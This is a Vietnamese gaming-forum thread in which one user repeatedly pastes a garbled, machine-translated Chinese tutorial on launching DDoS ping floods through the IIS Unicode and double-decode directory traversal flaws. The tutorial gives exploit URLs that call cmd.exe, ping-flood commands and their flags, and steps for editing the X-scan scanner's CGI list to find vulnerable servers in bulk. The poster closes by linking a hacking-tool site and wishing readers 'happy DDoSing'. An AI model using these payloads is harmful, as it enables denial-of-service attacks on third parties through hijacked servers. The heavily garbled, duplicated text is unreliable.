GAME ONLINE- tieng han` hoặc anh vô day
- Thread starter kazunoki
- Ngày gửi
- Status
kangta_viet
Youtube Master Race
- 27/1/06
- 12
- 0
- Banned
- #2
Realizes DDoS Ping using X-scan attacks
abu.
One, said from here,
As soon as starts, has no alternative but said two section influences strength very big DDoS the Ping bomb tool.
One is the snail bomb, one is AhBomb.
The snail bomb comes out is very early, has the loophole through the realization search the server completes the reserve, ha-ha, needs time, passes
Controls these has the loophole the server concentrates the Ping attack goal machine, causes the goal network speed to slow down, achieves the DDoS attack the goal.
AhBomb is one section more formidable attack tool which bigball writes, (ha-ha, here very thank him gives me infinite makes lithograph plates)
Said from the essence, the AhBomb realization method and the snail bomb has no difference, but because procedure compilation is very outstanding, multithreading
Writes separately special consummation, moreover lacks the province the parameter very possibly causes to be able to to bring by the aggressor the fatal attack.
Ha-ha
Or analyzes:
First starts from the snail bomb to mention
It has one search the process, searches the unicode loophole the main engine, then main engine address preservation in Server.dll document
In needs to implement attacks, reassignment all servers carries on attack.
I carry on the attack to one hypothesized goal 200.200.200.200 this ip, actually saves the data package which under the disposition intercepts:
Front part
Get /scripts/.. %c1%1c.. /winnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order.
Makes concrete the order which carries out is:
ping -l 65000 -n 500200.200.200.200
Here explains as follows:
ping one transmission test data package of examination network condition order
The -l 64000 transmissions contain by 64000 bytes data quantities ECHO data packages
-n 500 transmits 500 ECHO request data package
200.200.200.200 goals ip, ha-ha
Now looked is very clear, also with did not say.
These orders although are simple, but because ping order use only needs threshold user jurisdiction, but has the unicode loophole
The machine are again extremely many, this only then can cause the massive data to well up to one. Thereupon, hung.
What did we have a look AhBomb to do.
Front part
Get /scripts/.. %%255c.. %255cwinnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order, compared with new code therefore finds
The loophole server should be able to be more.
Makes concrete the order which carries out is:
ping 192.168.0.1 -t -i 255
Here explains as follows:
ping one transmission test data package of examination network condition order
-t does not stop the transmission ECHO data package, yes, does not stop
-i 255 TTL value supposes is 255 (is biggest)
192.168.0.1 goals, ha-ha
Carefully has a look its parameter and the snail bomb difference, specifically manifests in it certainly does not have the transmission large number according to the package, but merely is the transmission
Ordinary size package, because the very many networks equipment can filter the large package, the standard form instead only then can truly transmit the goal.
Here attaches: (TTL: The life, assigns the data newspaper the webpage quantity which loses by the router abandons before allows to pass. TTL is by transmits the main engine
The establishment, prevents the data package unceasingly forever will not terminate the circulation in the IP interconnection network. When retransmits the IP data package, request router
Reduces 1 to major general TTL.
Two, one section classical scanning tool X-scan
X-scan, the security focal point another strength does, from conception which as soon as starts, to the now entire opening -like structural design, this kind holds the spirit,
Isn't precisely we pursues?
Key mentions from its cgi scanning function
Selects in Tools CGI tabulates the maintenance function, may see listed from Windows to each edition Unix system
Possibly exists cgi loophole tabulate.
How is it confirms the server whether has the loophole?
The transfer order interpreter, carries out the dir order!
Trades your thought pattern, thinks with one hacker thought pattern
Transfers the dir order may, why can't we transfer other orders?
Ha-ha
This was the key point which I had to say
If I
/scripts/.. %255c.. %255cwinnt/system32/cmd.exe? /c+dir
For changes into
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.
、、、
ping -t -i 255 -w 5192.168.0.1
Why uses this order?
In order to is not filtered out by the network equipment, therefore does not transmit large number according to the package.
In order to can let our data package achieve the goal, we establish the TTL value are 255.
The -w 5 parameters, assign the overtime gap are 5 milliseconds, what no matter opposite party does return to the information is, does not stop send, ha-ha, this filters the ICMP package to some
Server or very is effective.
I open the cgi.lst document, manually edits content
At present will hit SP2 undergo the test later still can have the code loophole is the IIS-DECODE two codes loopholes.
I retained two most have the possibility the way storehouse, trimmed as follows:
Test goal ip is: 192.168.0.1
After opens in Tools CGI tabulates the maintenance chooses the new revision tabulates
To here, we so long as go to the big scale through X-scan the scanning cgi loophole, was allowed to implement to goal server DDoS Ping attacks.
To finally, Luo 嗦 one, under its practical any platform cgi scanning tool, slightly makes the revision, all may realize our goal.
Makes the explanation with X-scan is because of its splendor, as well as it is scanning the cgi loophole time is supports the proxy server connects.
、、、
abu.
China overcomes nature the net
abu.
One, said from here,
As soon as starts, has no alternative but said two section influences strength very big DDoS the Ping bomb tool.
One is the snail bomb, one is AhBomb.
The snail bomb comes out is very early, has the loophole through the realization search the server completes the reserve, ha-ha, needs time, passes
Controls these has the loophole the server concentrates the Ping attack goal machine, causes the goal network speed to slow down, achieves the DDoS attack the goal.
AhBomb is one section more formidable attack tool which bigball writes, (ha-ha, here very thank him gives me infinite makes lithograph plates)
Said from the essence, the AhBomb realization method and the snail bomb has no difference, but because procedure compilation is very outstanding, multithreading
Writes separately special consummation, moreover lacks the province the parameter very possibly causes to be able to to bring by the aggressor the fatal attack.
Ha-ha
Or analyzes:
First starts from the snail bomb to mention
It has one search the process, searches the unicode loophole the main engine, then main engine address preservation in Server.dll document
In needs to implement attacks, reassignment all servers carries on attack.
I carry on the attack to one hypothesized goal 200.200.200.200 this ip, actually saves the data package which under the disposition intercepts:
Front part
Get /scripts/.. %c1%1c.. /winnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order.
Makes concrete the order which carries out is:
ping -l 65000 -n 500200.200.200.200
Here explains as follows:
ping one transmission test data package of examination network condition order
The -l 64000 transmissions contain by 64000 bytes data quantities ECHO data packages
-n 500 transmits 500 ECHO request data package
200.200.200.200 goals ip, ha-ha
Now looked is very clear, also with did not say.
These orders although are simple, but because ping order use only needs threshold user jurisdiction, but has the unicode loophole
The machine are again extremely many, this only then can cause the massive data to well up to one. Thereupon, hung.
What did we have a look AhBomb to do.
Front part
Get /scripts/.. %%255c.. %255cwinnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order, compared with new code therefore finds
The loophole server should be able to be more.
Makes concrete the order which carries out is:
ping 192.168.0.1 -t -i 255
Here explains as follows:
ping one transmission test data package of examination network condition order
-t does not stop the transmission ECHO data package, yes, does not stop
-i 255 TTL value supposes is 255 (is biggest)
192.168.0.1 goals, ha-ha
Carefully has a look its parameter and the snail bomb difference, specifically manifests in it certainly does not have the transmission large number according to the package, but merely is the transmission
Ordinary size package, because the very many networks equipment can filter the large package, the standard form instead only then can truly transmit the goal.
Here attaches: (TTL: The life, assigns the data newspaper the webpage quantity which loses by the router abandons before allows to pass. TTL is by transmits the main engine
The establishment, prevents the data package unceasingly forever will not terminate the circulation in the IP interconnection network. When retransmits the IP data package, request router
Reduces 1 to major general TTL.
Two, one section classical scanning tool X-scan
X-scan, the security focal point another strength does, from conception which as soon as starts, to the now entire opening -like structural design, this kind holds the spirit,
Isn't precisely we pursues?
Key mentions from its cgi scanning function
Selects in Tools CGI tabulates the maintenance function, may see listed from Windows to each edition Unix system
Possibly exists cgi loophole tabulate.
How is it confirms the server whether has the loophole?
The transfer order interpreter, carries out the dir order!
Trades your thought pattern, thinks with one hacker thought pattern
Transfers the dir order may, why can't we transfer other orders?
Ha-ha
This was the key point which I had to say
If I
/scripts/.. %255c.. %255cwinnt/system32/cmd.exe? /c+dir
For changes into
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.
、、、
ping -t -i 255 -w 5192.168.0.1
Why uses this order?
In order to is not filtered out by the network equipment, therefore does not transmit large number according to the package.
In order to can let our data package achieve the goal, we establish the TTL value are 255.
The -w 5 parameters, assign the overtime gap are 5 milliseconds, what no matter opposite party does return to the information is, does not stop send, ha-ha, this filters the ICMP package to some
Server or very is effective.
I open the cgi.lst document, manually edits content
At present will hit SP2 undergo the test later still can have the code loophole is the IIS-DECODE two codes loopholes.
I retained two most have the possibility the way storehouse, trimmed as follows:
Test goal ip is: 192.168.0.1
After opens in Tools CGI tabulates the maintenance chooses the new revision tabulates
To here, we so long as go to the big scale through X-scan the scanning cgi loophole, was allowed to implement to goal server DDoS Ping attacks.
To finally, Luo 嗦 one, under its practical any platform cgi scanning tool, slightly makes the revision, all may realize our goal.
Makes the explanation with X-scan is because of its splendor, as well as it is scanning the cgi loophole time is supports the proxy server connects.
、、、
abu.
China overcomes nature the net
kangta_viet
Youtube Master Race
- 27/1/06
- 12
- 0
- Banned
- #3
Realizes DDoS Ping using X-scan attacks
abu.
One, said from here,
As soon as starts, has no alternative but said two section influences strength very big DDoS the Ping bomb tool.
One is the snail bomb, one is AhBomb.
The snail bomb comes out is very early, has the loophole through the realization search the server completes the reserve, ha-ha, needs time, passes
Controls these has the loophole the server concentrates the Ping attack goal machine, causes the goal network speed to slow down, achieves the DDoS attack the goal.
AhBomb is one section more formidable attack tool which bigball writes, (ha-ha, here very thank him gives me infinite makes lithograph plates)
Said from the essence, the AhBomb realization method and the snail bomb has no difference, but because procedure compilation is very outstanding, multithreading
Writes separately special consummation, moreover lacks the province the parameter very possibly causes to be able to to bring by the aggressor the fatal attack.
Ha-ha
Or analyzes:
First starts from the snail bomb to mention
It has one search the process, searches the unicode loophole the main engine, then main engine address preservation in Server.dll document
In needs to implement attacks, reassignment all servers carries on attack.
I carry on the attack to one hypothesized goal 200.200.200.200 this ip, actually saves the data package which under the disposition intercepts:
Front part
Get /scripts/.. %c1%1c.. /winnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order.
Makes concrete the order which carries out is:
ping -l 65000 -n 500200.200.200.200
Here explains as follows:
ping one transmission test data package of examination network condition order
The -l 64000 transmissions contain by 64000 bytes data quantities ECHO data packages
-n 500 transmits 500 ECHO request data package
200.200.200.200 goals ip, ha-ha
Now looked is very clear, also with did not say.
These orders although are simple, but because ping order use only needs threshold user jurisdiction, but has the unicode loophole
The machine are again extremely many, this only then can cause the massive data to well up to one. Thereupon, hung.
What did we have a look AhBomb to do.
Front part
Get /scripts/.. %%255c.. %255cwinnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order, compared with new code therefore finds
The loophole server should be able to be more.
Makes concrete the order which carries out is:
ping 192.168.0.1 -t -i 255
Here explains as follows:
ping one transmission test data package of examination network condition order
-t does not stop the transmission ECHO data package, yes, does not stop
-i 255 TTL value supposes is 255 (is biggest)
192.168.0.1 goals, ha-ha
Carefully has a look its parameter and the snail bomb difference, specifically manifests in it certainly does not have the transmission large number according to the package, but merely is the transmission
Ordinary size package, because the very many networks equipment can filter the large package, the standard form instead only then can truly transmit the goal.
Here attaches: (TTL: The life, assigns the data newspaper the webpage quantity which loses by the router abandons before allows to pass. TTL is by transmits the main engine
The establishment, prevents the data package unceasingly forever will not terminate the circulation in the IP interconnection network. When retransmits the IP data package, request router
Reduces 1 to major general TTL.
Two, one section classical scanning tool X-scan
X-scan, the security focal point another strength does, from conception which as soon as starts, to the now entire opening -like structural design, this kind holds the spirit,
Isn't precisely we pursues?
Key mentions from its cgi scanning function
Selects in Tools CGI tabulates the maintenance function, may see listed from Windows to each edition Unix system
Possibly exists cgi loophole tabulate.
How is it confirms the server whether has the loophole?
The transfer order interpreter, carries out the dir order!
Trades your thought pattern, thinks with one hacker thought pattern
Transfers the dir order may, why can't we transfer other orders?
Ha-ha
This was the key point which I had to say
If I
/scripts/.. %255c.. %255cwinnt/system32/cmd.exe? /c+dir
For changes into
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.
、、、
ping -t -i 255 -w 5192.168.0.1
Why uses this order?
In order to is not filtered out by the network equipment, therefore does not transmit large number according to the package.
In order to can let our data package achieve the goal, we establish the TTL value are 255.
The -w 5 parameters, assign the overtime gap are 5 milliseconds, what no matter opposite party does return to the information is, does not stop send, ha-ha, this filters the ICMP package to some
Server or very is effective.
I open the cgi.lst document, manually edits content
At present will hit SP2 undergo the test later still can have the code loophole is the IIS-DECODE two codes loopholes.
I retained two most have the possibility the way storehouse, trimmed as follows:
Test goal ip is: 192.168.0.1
After opens in Tools CGI tabulates the maintenance chooses the new revision tabulates
To here, we so long as go to the big scale through X-scan the scanning cgi loophole, was allowed to implement to goal server DDoS Ping attacks.
To finally, Luo 嗦 one, under its practical any platform cgi scanning tool, slightly makes the revision, all may realize our goal.
Makes the explanation with X-scan is because of its splendor, as well as it is scanning the cgi loophole time is supports the proxy server connects.
、、、
abu.
China overcomes nature the net
Đây là 1 website khá hay về DDOS serve , có rất nhiều công cụ cũ và mới .:http://www.hacker001.com/Soft/hacksoft/attack/List_11.html .ABom là 1 ví dụ điển hình để DDOS .
Chúc các bạn DDOS vui vẻ!!!
abu.
One, said from here,
As soon as starts, has no alternative but said two section influences strength very big DDoS the Ping bomb tool.
One is the snail bomb, one is AhBomb.
The snail bomb comes out is very early, has the loophole through the realization search the server completes the reserve, ha-ha, needs time, passes
Controls these has the loophole the server concentrates the Ping attack goal machine, causes the goal network speed to slow down, achieves the DDoS attack the goal.
AhBomb is one section more formidable attack tool which bigball writes, (ha-ha, here very thank him gives me infinite makes lithograph plates)
Said from the essence, the AhBomb realization method and the snail bomb has no difference, but because procedure compilation is very outstanding, multithreading
Writes separately special consummation, moreover lacks the province the parameter very possibly causes to be able to to bring by the aggressor the fatal attack.
Ha-ha
Or analyzes:
First starts from the snail bomb to mention
It has one search the process, searches the unicode loophole the main engine, then main engine address preservation in Server.dll document
In needs to implement attacks, reassignment all servers carries on attack.
I carry on the attack to one hypothesized goal 200.200.200.200 this ip, actually saves the data package which under the disposition intercepts:
Front part
Get /scripts/.. %c1%1c.. /winnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order.
Makes concrete the order which carries out is:
ping -l 65000 -n 500200.200.200.200
Here explains as follows:
ping one transmission test data package of examination network condition order
The -l 64000 transmissions contain by 64000 bytes data quantities ECHO data packages
-n 500 transmits 500 ECHO request data package
200.200.200.200 goals ip, ha-ha
Now looked is very clear, also with did not say.
These orders although are simple, but because ping order use only needs threshold user jurisdiction, but has the unicode loophole
The machine are again extremely many, this only then can cause the massive data to well up to one. Thereupon, hung.
What did we have a look AhBomb to do.
Front part
Get /scripts/.. %%255c.. %255cwinnt/system32/cmd.exe? /c
Is transfers the Windows server through the unicode code the order interpreter carries out the order, compared with new code therefore finds
The loophole server should be able to be more.
Makes concrete the order which carries out is:
ping 192.168.0.1 -t -i 255
Here explains as follows:
ping one transmission test data package of examination network condition order
-t does not stop the transmission ECHO data package, yes, does not stop
-i 255 TTL value supposes is 255 (is biggest)
192.168.0.1 goals, ha-ha
Carefully has a look its parameter and the snail bomb difference, specifically manifests in it certainly does not have the transmission large number according to the package, but merely is the transmission
Ordinary size package, because the very many networks equipment can filter the large package, the standard form instead only then can truly transmit the goal.
Here attaches: (TTL: The life, assigns the data newspaper the webpage quantity which loses by the router abandons before allows to pass. TTL is by transmits the main engine
The establishment, prevents the data package unceasingly forever will not terminate the circulation in the IP interconnection network. When retransmits the IP data package, request router
Reduces 1 to major general TTL.
Two, one section classical scanning tool X-scan
X-scan, the security focal point another strength does, from conception which as soon as starts, to the now entire opening -like structural design, this kind holds the spirit,
Isn't precisely we pursues?
Key mentions from its cgi scanning function
Selects in Tools CGI tabulates the maintenance function, may see listed from Windows to each edition Unix system
Possibly exists cgi loophole tabulate.
How is it confirms the server whether has the loophole?
The transfer order interpreter, carries out the dir order!
Trades your thought pattern, thinks with one hacker thought pattern
Transfers the dir order may, why can't we transfer other orders?
Ha-ha
This was the key point which I had to say
If I
/scripts/.. %255c.. %255cwinnt/system32/cmd.exe? /c+dir
For changes into
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.
、、、
ping -t -i 255 -w 5192.168.0.1
Why uses this order?
In order to is not filtered out by the network equipment, therefore does not transmit large number according to the package.
In order to can let our data package achieve the goal, we establish the TTL value are 255.
The -w 5 parameters, assign the overtime gap are 5 milliseconds, what no matter opposite party does return to the information is, does not stop send, ha-ha, this filters the ICMP package to some
Server or very is effective.
I open the cgi.lst document, manually edits content
At present will hit SP2 undergo the test later still can have the code loophole is the IIS-DECODE two codes loopholes.
I retained two most have the possibility the way storehouse, trimmed as follows:
Test goal ip is: 192.168.0.1
After opens in Tools CGI tabulates the maintenance chooses the new revision tabulates
To here, we so long as go to the big scale through X-scan the scanning cgi loophole, was allowed to implement to goal server DDoS Ping attacks.
To finally, Luo 嗦 one, under its practical any platform cgi scanning tool, slightly makes the revision, all may realize our goal.
Makes the explanation with X-scan is because of its splendor, as well as it is scanning the cgi loophole time is supports the proxy server connects.
、、、
abu.
China overcomes nature the net
Đây là 1 website khá hay về DDOS serve , có rất nhiều công cụ cũ và mới .:http://www.hacker001.com/Soft/hacksoft/attack/List_11.html .ABom là 1 ví dụ điển hình để DDOS .
Chúc các bạn DDOS vui vẻ!!!
- 19/10/04
- 4,563
- 37
đúng là loạn cào cào cả lên mod đâu cả rồi.Chán thế àh.Để mấy tên này post bài thế này sao
haylachinhminh
Fire in the hole!
- 21/1/05
- 2,902
- 3
Dài quá , ngắn 1 chút còn ráng đọc , dài we' chừng T_T , ông dịch sang tiếng vịt đi
ac. cái website ông đưa toàn là tiếng china T_T
ac. cái website ông đưa toàn là tiếng china T_T
- Status